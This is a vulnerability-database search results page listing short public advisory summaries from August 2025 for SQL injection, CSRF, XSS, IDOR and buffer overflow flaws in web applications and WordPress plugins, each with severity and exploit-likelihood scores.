Lucene search
K

1395 matches found

CNVD
CNVD
added 2025/08/20 12:0 a.m.6 views

Online Medicine Guide /adphar.php File SQL Injection Vulnerability

Online Medicine Guide is an online medical guide. Online Medicine Guide suffers from a SQL injection vulnerability that stems from a lack of validation of externally entered SQL statements in the parameter phuname in the file /adphar.php. The vulnerability can be exploited to execute illegal SQL...

9.8CVSS8AI score0.00387EPSS
Exploits1References1
CNVD
CNVD
added 2025/08/20 12:0 a.m.3 views

Travel Management System /updatepackage.php File SQL Injection Vulnerability

Travel Management System is a travel management system. Travel Management System suffers from a SQL injection vulnerability that stems from the lack of validation of externally entered SQL statements in parameter s1 in file /updatepackage.php. An attacker can exploit this vulnerability to execute...

9.8CVSS8.3AI score0.00387EPSS
Exploits1References1
CNVD
CNVD
added 2025/08/20 12:0 a.m.2 views

WordPress Add User Meta plugin Cross-Site Request Forgery Vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress plugin is an application plugin. A cross-site request forgery vulnerability exists in the WordPress Add User Meta plugin, which stems from missing or incorrect validation of random numbers on the "add-user-meta...

6.1CVSS6.8AI score0.00141EPSS
Exploits0References1
Cvelist
Cvelist
added 2025/08/19 7:6 p.m.9 views

CVE-2025-55737 flaskBlog arbitrary comment delete

flaskBlog is a blog app built with Flask. In 2.8.0 and earlier, when deleting a comment, there's no validation of the ownership of the comment. Every user can delete an arbitrary comment of another user on every post, by simply intercepting the delete request and changing the commentID. The code...

6.9CVSS0.00274EPSS
Exploits1References1
OSV
OSV
added 2025/08/19 6:56 p.m.5 views

CVE-2025-55735 flaskBlog Stored XSS Vulnerability

flaskBlog is a blog app built with Flask. In 2.8.0 and earlier, when creating a post, there's no validation of the content of the post stored in the variable "postContent". The vulnerability arises when displaying the content of the post using the | safe filter, that tells the engine to not escap...

5.3CVSS6.3AI score0.00192EPSS
Exploits1References3
Cvelist
Cvelist
added 2025/08/19 12:0 a.m.7 views

CVE-2025-51539

EzGED3 3.5.0 contains an unauthenticated arbitrary file read vulnerability due to improper access control and insufficient input validation in a script exposed via the web interface. A remote attacker can supply a crafted path parameter to a PHP script to read arbitrary files from the filesystem...

0.00667EPSS
Exploits1References1
NVD
NVD
added 2025/08/18 2:15 p.m.14 views

CVE-2025-4962

An Insecure Direct Object Reference IDOR vulnerability was identified in the POST /v1/templates endpoint of the Lunary API, affecting versions up to 0.8.8. This vulnerability allows authenticated users to create templates in another user's project by altering the projectId query parameter. The ro...

7.7CVSS0.00217EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2025/08/18 1:27 p.m.6 views

CVE-2025-4962 IDOR Vulnerability in Template Creation via `projectId` Manipulation in lunary-ai/lunary

An Insecure Direct Object Reference IDOR vulnerability was identified in the POST /v1/templates endpoint of the Lunary API, affecting versions up to 0.8.8. This vulnerability allows authenticated users to create templates in another user's project by altering the projectId query parameter. The ro...

7.7CVSS6.8AI score0.00217EPSS
Exploits0References2
RedhatCVE
RedhatCVE
added 2025/08/18 4:31 a.m.9 views

CVE-2025-7683

The LatestCheckins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1. This is due to missing or incorrect nonce validation on the 'LatestCheckins' page. This makes it possible for unauthenticated attackers to update settings and inject...

6.1CVSS6.7AI score0.00159EPSS
Exploits0References1
CNNVD
CNNVD
added 2025/08/18 12:0 a.m.3 views

Ashlar-Vellum多款产品 缓冲区错误漏洞

Ashlar-Vellum Xenon and others are products of Ashlar-Vellum.Ashlar-Vellum Xenon is a CAD modeling software.Ashlar-Vellum Cobalt is a parametric-based computer-aided design and 3D modeling program.Ashlar-Vellum Argon is A 2D drafting and 3D modeling software. A buffer error vulnerability exists i...

8.4CVSS7.1AI score0.00158EPSS
Exploits0References2
RedhatCVE
RedhatCVE
added 2025/08/17 8:29 a.m.11 views

CVE-2025-7688

The Add User Meta plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the 'add-user-meta' page. This makes it possible for unauthenticated attackers to update settings and inject...

6.1CVSS6.7AI score0.00141EPSS
Exploits0References1
NVD
NVD
added 2025/08/16 4:16 a.m.6 views

CVE-2025-7683

The LatestCheckins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1. This is due to missing or incorrect nonce validation on the 'LatestCheckins' page. This makes it possible for unauthenticated attackers to update settings and inject...

6.1CVSS0.00159EPSS
Exploits0References3
Cvelist
Cvelist
added 2025/08/16 3:38 a.m.8 views

CVE-2025-7686 weichuncai(WP伪春菜) <= 1.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting

The weichuncaiWP伪春菜 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the sm-options.php page. This makes it possible for unauthenticated attackers to update settings and inject...

6.1CVSS0.00127EPSS
Exploits0References2
CNNVD
CNNVD
added 2025/08/16 12:0 a.m.4 views

WordPress plugin School Management System for Wordpress 代码问题漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A code issue vulnerability exists in...

8.8CVSS6.9AI score0.00519EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2025/08/16 12:0 a.m.5 views

PT-2025-33531 · WordPress · Linux Promotional Plugin For Wordpress

Name of the Vulnerable Software and Affected Versions: Linux Promotional Plugin for WordPress versions up to and including 1.4 Description: The Linux Promotional Plugin for WordPress is susceptible to Cross-Site Request Forgery due to missing or incorrect nonce validation on the...

6.1CVSS6.3AI score0.00159EPSS
Exploits0References7
Cvelist
Cvelist
added 2025/08/15 2:24 a.m.8 views

CVE-2025-6025 Order Tip for WooCommerce <= 1.5.4 - Unauthenticated Tip Manipulation to Negative Value Leading to Unauthorized Discounts

The Order Tip for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Improper Input Validation in all versions up to, and including, 1.5.4. This is due to lack of server-side validation on the data-tip attribute, which makes it possible for unauthenticated attackers to apply an...

7.5CVSS0.00425EPSS
Exploits0References4
Tenable Nessus
Tenable Nessus
added 2025/08/15 12:0 a.m.3 views

Linux Distros Unpatched Vulnerability : CVE-2019-11765

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - A compromised content process could send a message to the parent process that would cause the 'Click to Play' permission prompt to be shown. However, due to lac...

6.5CVSS7.5AI score0.00844EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2025/08/13 3:42 a.m.6 views

CVE-2025-8891 OceanWP <= 4.0.9 - 4.1.1 - Cross-Site Request Forgery to Ocean Extra Plugin Installation

The OceanWP theme for WordPress is vulnerable to Cross-Site Request Forgery in versions 4.0.9 to 4.1.1. This is due to missing or incorrect nonce validation on the oceanwpnoticebuttonclick function. This makes it possible for unauthenticated attackers to install the Ocean Extra plugin via a forge...

4.3CVSS6.7AI score0.00191EPSS
Exploits1References3
RedhatCVE
RedhatCVE
added 2025/08/13 12:11 a.m.7 views

CVE-2025-51823

libcsp 2.0 is vulnerable to Buffer Overflow in the cspethinit function due to improper handling of the ifname parameter. The function uses strcpy to copy the interface name into a structure member ctx-name without validating the input length...

6.5CVSS7.2AI score0.00247EPSS
Exploits0References1
CNNVD
CNNVD
added 2025/08/13 12:0 a.m.2 views

Code-Projects Job Diary 注入漏洞

Job Diary is a job diary software. Job Diary suffers from a SQL injection vulnerability that stems from the lack of validation of externally entered SQL statements in the parameter jobtitle in the file /user-apply.php. An attacker can exploit this vulnerability to execute illegal SQL commands to...

9.8CVSS8.2AI score0.00409EPSS
Exploits1References5
Rows per page
Query Builder